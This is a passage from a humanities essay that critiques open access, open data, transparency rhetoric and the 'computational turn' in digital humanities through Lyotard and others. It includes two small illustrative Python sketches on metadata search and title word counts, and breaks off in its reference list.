contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competitiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need at all to make difficult policy decisions about what data and information it is right to publish online and what to keep secret. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes.
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer – but not academic researchers or the public – to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million people worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat far-fetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking.
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and in the shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance, is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all-pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today – and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. (Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate'] controversy, in which climate sceptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists had tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]’. ‘Let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard to which I am going to return at more length: who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hillary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama administration from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65 per cent of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and the use of the password-protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as ''The Guardian'' has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so may of course be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just on their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word ''datum'', meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented help to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010a). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata are, and who knows what needs to be decided (1986: 9)? Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers’, not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
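&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (To make the point about framing concrete, the following is a deliberately minimal sketch in Python. The records, field names and search function are invented for illustration – they are not drawn from any actual catalogue, schema or repository – but they show how a record indexed without a given field simply never surfaces in a query on that field, however openly accessible the underlying text may be.) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;pre&amp;gt;
# Hypothetical sketch: metadata records as plain dictionaries.
# The field names ('title', 'publisher', 'subject') are illustrative
# choices; whoever defines the schema decides what is findable.
records = [
    {'title': 'A Thousand Plateaus', 'publisher': 'Athlone',
     'year': 1988, 'subject': 'philosophy'},
    # The second record has no 'subject' field, so subject searches
    # will never 'see' it, however freely available the book is.
    {'title': 'The Postmodern Condition',
     'publisher': 'Manchester University Press', 'year': 1986},
]

def search(items, field, value):
    """Return records whose metadata field matches value; records
    lacking the field are silently excluded rather than reported."""
    return [r for r in items if r.get(field) == value]

print(search(records, 'subject', 'philosophy'))  # finds only the first record
&amp;lt;/pre&amp;gt;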
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making research and data open and free is also lacking in self-reflexivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that explicitly emphasize the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades in which humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of the current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgin], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently cited [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier, courtesy of Lev Manovich and the Software Studies Initiative, offer others. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition of critical engagement with the visual appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect, etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors?’, he asks (Manovich, 2010a). Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America, has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike Google) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories, many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2010a)? 
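&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The calculation itself is trivially easy to state in code. The following Python sketch uses a handful of invented titles and dates – not Cohen and Gibbs’s Google-digitized corpus – purely to show how mechanically such a ‘spike’ is produced: count the titles containing a word, year by year, and compare the numbers. The interpretive question of what those numbers mean is exactly what the code does not answer.) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;pre&amp;gt;
# Toy sketch of title-mining with invented data (not Cohen and
# Gibbs's corpus): how often does a word appear in titles, per year?
from collections import Counter

titles = [
    (1790, 'Reflections on the Revolution in France'),
    (1815, 'A Treatise on Political Economy'),
    (1848, 'The Coming Revolution'),
    (1848, 'Revolution and Reform in Europe'),
    (1865, 'Notes on English Country Life'),
]

def word_counts_by_year(titles, word):
    """Count, per year, how many titles contain word (case-insensitive)."""
    counts = Counter()
    for year, title in titles:
        if word.lower() in title.lower():
            counts[year] += 1
    return dict(sorted(counts.items()))

print(word_counts_by_year(titles, 'revolution'))
# {1790: 1, 1848: 2} -- the 'spike' is simply the larger count
&amp;lt;/pre&amp;gt;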
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is vitally important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this ‘experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship, moreover, that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and mathematics) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). 
To what extent is the take-up of practical techniques and approaches from computer science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information – so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, in order to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al. call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are simply suffering from green fatigue: bored with thinking about the issue, they are enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26 million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue that there is too much information rather risks implying that there is a proper amount of information – and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might agree with them nonetheless when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). 
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at Data Landscapes, an AHRC network event held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of this material appeared in Hall [2010].) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol. 7, no. 1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011a), ‘“There’s Been Too Much Secrecy in this City”: The False Choice Between Secrecy and Transparency in US Politics’, ''Cultural Politics'', 7(1), March: 133-156. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011b, forthcoming), ‘Transparency, Interrupted: Secrets of the Left’, ‘Between Transparency and Secrecy’, Annual Review, ''Theory, Culture and Society'', December. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom’: the prepared text of U.S. Secretary of State Hillary Rodham Clinton’s speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 